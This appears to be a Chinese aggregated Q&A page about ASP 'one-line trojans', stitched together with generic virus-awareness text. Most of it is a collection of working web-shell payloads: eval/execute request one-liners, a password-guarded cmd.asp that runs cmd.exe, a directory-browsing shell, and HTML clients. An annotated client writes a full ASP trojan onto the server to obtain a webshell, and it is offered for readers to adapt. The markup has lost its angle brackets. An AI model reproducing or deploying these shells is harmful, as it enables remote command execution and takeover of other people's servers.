本文目录一览:
-
2、一句话木马
一句话木马怎么使用
别用木马,对电脑危害很大
杀毒软件直接杀毒不就得了么
安装个电脑管家到电脑上
然后使用病毒查杀,对着你的电脑杀毒就行了
一句话木马
ASP一句话木马大全!
%eval request("MH")%
%execute request("MH")%
%execute(request("MH"))%
%If Request("MH")"" Then Execute(Request("MH"))%
%if request ("MH")""then session("MH")=request("MH"):end if:if session("MH")"" then execute session("MH")%
SCRIPT language=VBScript runat="server"execute request("MH")/SCRIPT
%@ Page Language="Jscript"%
%eval(Request.Item["MH"],"unsafe");%
1 asp一句话木马
一句话木马 服务器端
带验证:
——————————————cmd.asp————————————————
if request("authkey")="pic16f873a" then
textarea readonly cols=80 rows=25
%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request("cmd")).stdout.readall%
/textarea
end if
带验证 客户端
——————————————cmd.html————————————————
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Cmd :input type=text name=cmd size=65 value="cmd"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command"
/FORM
/div
目录浏览
服务器端
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items
for each iii in diritems
response.write iii.path "font color=blue[" iii.size "]/fontbr"
next
end if
客户端
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Path:input type=text name=path size=65 value="C:\"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command"
/FORM
/div
一句话木马客户端源文件:
里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
form action= method=post
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接处理
textarea name=value cols=120 rows=10 width=45
//这里的value值根据服务端%execute request("value")%中value而设定
//可以自行修改成%execute request("p")%相应这里的value值也必须改为p
set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
/textarea
//这段程序的功能:利用插入到数据库文件的%execute request("value")%这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了
textarea name=joeving cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr
//这段标签是你用来添加木马内容用的
input type=submit value=提交
/form
//程序的主要框架是
form
textarea/textarea//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
textarea/textarea//添加木马内容用的
/form
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵
希望对你能有所帮助。
一句话木马是什么?
有点耐心:木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。
传染方式:通过电子邮件附件发出,捆绑在其他的程序中。
病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法操作。
防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。
一句话病毒对电脑影响大不大?
无害型:除了传染时减少磁盘的可用空间外,对系统没有其它影响。
无危险型:这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。
危险型:这类病毒在计算机系统操作中造成严重的错误。
非常危险型:这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。这些病毒对系统造成的危害,并不是本身的算法中存在危险的调用,而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区,这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。例如:在早期的病毒中,有一个“Denzuk”病毒在360K磁盘上很好的工作,不会造成任何破坏,但是在后来的高密度软盘上却能引起大量的数据丢失。